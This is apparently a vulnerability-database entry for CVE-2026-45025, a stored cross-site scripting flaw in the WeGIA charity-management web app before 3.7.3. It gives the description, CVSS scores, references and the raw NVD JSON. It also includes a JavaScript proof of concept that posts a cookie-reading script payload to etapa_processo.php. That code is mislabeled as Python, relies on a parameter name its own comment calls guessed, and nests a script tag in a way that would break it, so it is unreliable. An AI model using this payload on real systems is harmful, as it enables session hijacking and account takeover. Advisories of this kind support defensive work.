CVE-2026-45025

Description

WeGIA is a web manager for charitable institutions. In versions prior to 3.7.3, a Stored Cross-Site Scripting (XSS) vulnerability allows an authenticated user to inject malicious JavaScript into the "Etapas de um Processo" (html/atendido/etapa_processo.php) page, which is executed when user access the the page, enabling session hijacking and account takeover. This vulnerability is fixed in 3.7.3.

CVSS Details

CVSS Score

6.8

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WeGIA < 3.7.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!--
// Proof of Concept for CVE-2026-45025
// Target: WeGIA < 3.7.3
// Endpoint: html/atendido/etapa_processo.php
-->

<script>
// Simulate a POST request to inject the payload
function injectXSS() {
    const payload = '<script>alert(document.cookie)</script>';
    const formData = new FormData();
    formData.append('etapa_processo', payload); // Vulnerable parameter name based on context
    formData.append('submit', 'Salvar');

    fetch('/html/atendido/etapa_processo.php', {
        method: 'POST',
        body: formData,
        credentials: 'include'
    })
    .then(response => {
        if(response.ok) {
            console.log('Payload injected successfully. Visit the page to trigger XSS.');
        }
    });
}

// Trigger injection
injectXSS();
</script>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-45025
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-45025
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-45025/
[4] VulDB https://vuldb.com/cve/CVE-2026-45025
[5] https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-g78v-g28w-rg73
[6] https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-g78v-g28w-rg73

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-45025", "sourceIdentifier": "[email protected]", "published": "2026-05-11T20:25:46.907", "lastModified": "2026-05-11T21:19:02.380", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "WeGIA is a web manager for charitable institutions. In versions prior to 3.7.3, a Stored Cross-Site Scripting (XSS) vulnerability allows an authenticated user to inject malicious JavaScript into the \"Etapas de um Processo\" (html/atendido/etapa_processo.php) page, which is executed when user access the the page, enabling session hijacking and account takeover. This vulnerability is fixed in 3.7.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-g78v-g28w-rg73", "source": "[email protected]"}, {"url": "https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-g78v-g28w-rg73", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}